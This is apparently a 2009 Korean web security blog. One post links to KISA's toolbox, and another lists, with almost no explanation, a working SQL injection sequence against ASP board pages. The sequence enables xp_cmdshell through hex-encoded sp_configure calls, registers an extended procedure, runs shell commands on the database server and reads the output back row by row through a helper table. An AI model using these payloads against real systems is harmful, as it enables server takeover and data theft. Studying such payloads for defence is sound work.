Posted by 김주일
Application/Web Security 2009. 12. 23. 09:38

KISA's web security services are all gathered in one place here.

Link: http://toolbox.krcert.or.kr/
Posted by 김주일
Application/Web Security 2009. 12. 20. 12:35
Posted by 김주일
Application/Web Security 2009. 11. 17. 09:22
Posted by 김주일
When will I get around to testing this..


Source: http://ptresearch.blogspot.com/2009/11/another-fine-method-to-exploit-sql.htm
Posted by 김주일

/board_view.asp?num=50%20;exec%20sp_configure%200x41006400200048006f00630020004400690073007400720069006200750074006500640020005100750065007200690065007300,1;
reconfigure;
exec%20sp_configure%200x730068006f007700200061006400760061006e0063006500640020006f007000740069006f006e007300,1;
reconfigure;
exec%20sp_configure%200x780070005f0063006d0064007300680065006c006c00,1;
reconfigure;--

exec sp_configure 'Ad Hoc Distributed Queries',1;
reconfigure;
exec sp_configure 'show advanced options',1;
reconfigure;
exec sp_configure xp_cmdshell,1;
reconfigure;--

/bbs_view.asp?num=39%20;exec%20master.dbo.sp_addextendedproc%200x780070005f006400690072007400720065006500,%200x7800700073007400610072002e0064006c006c00--

 

/board_view.asp?num=50 ;create table [pangolin_test_table]([resulttxt] nvarchar(4000) null);--

/board_view.asp?num=50 ;declare @z nvarchar(4000) set @z=0xdir c:\ insert into [pangolin_test_table](resulttxt) exec master.dbo.xp_cmdshell @z;alter table [pangolin_test_table] add id int not null identity (1,1)--

/board_view.asp?num=50 and (select cast(count(1) as varchar(8000))+char(94) from [web]..[pangolin_test_table])>0--

/board_view.asp?num=50 and (select top 1 case when resulttxt is null then char(124) else resulttxt+char(124) end  from [pangolin_test_table] order by [id]) >0--

/board_view.asp?num=50 and (select top 1 case when resulttxt is null then char(124) else resulttxt+char(124) end  from [pangolin_test_table] where id not in (select top 2 id from [pangolin_test_table] order by [id]) )>0--

/board_view.asp?num=50 and (select top 1 case when resulttxt is null then char(124) else resulttxt+char(124) end  from [pangolin_test_table] where id not in (select top 3 id from [pangolin_test_table] order by [id]) )>0--

/board_view.asp?num=50 and (select top 1 case when resulttxt is null then char(124) else resulttxt+char(124) end  from [pangolin_test_table] where id not in (select top 4 id from [pangolin_test_table] order by [id]) )>0--

/board_view.asp?num=50 and (select top 1 case when resulttxt is null then char(124) else resulttxt+char(124) end  from [pangolin_test_table] where id not in (select top 5 id from [pangolin_test_table] order by [id]) )>0--

Posted by 김주일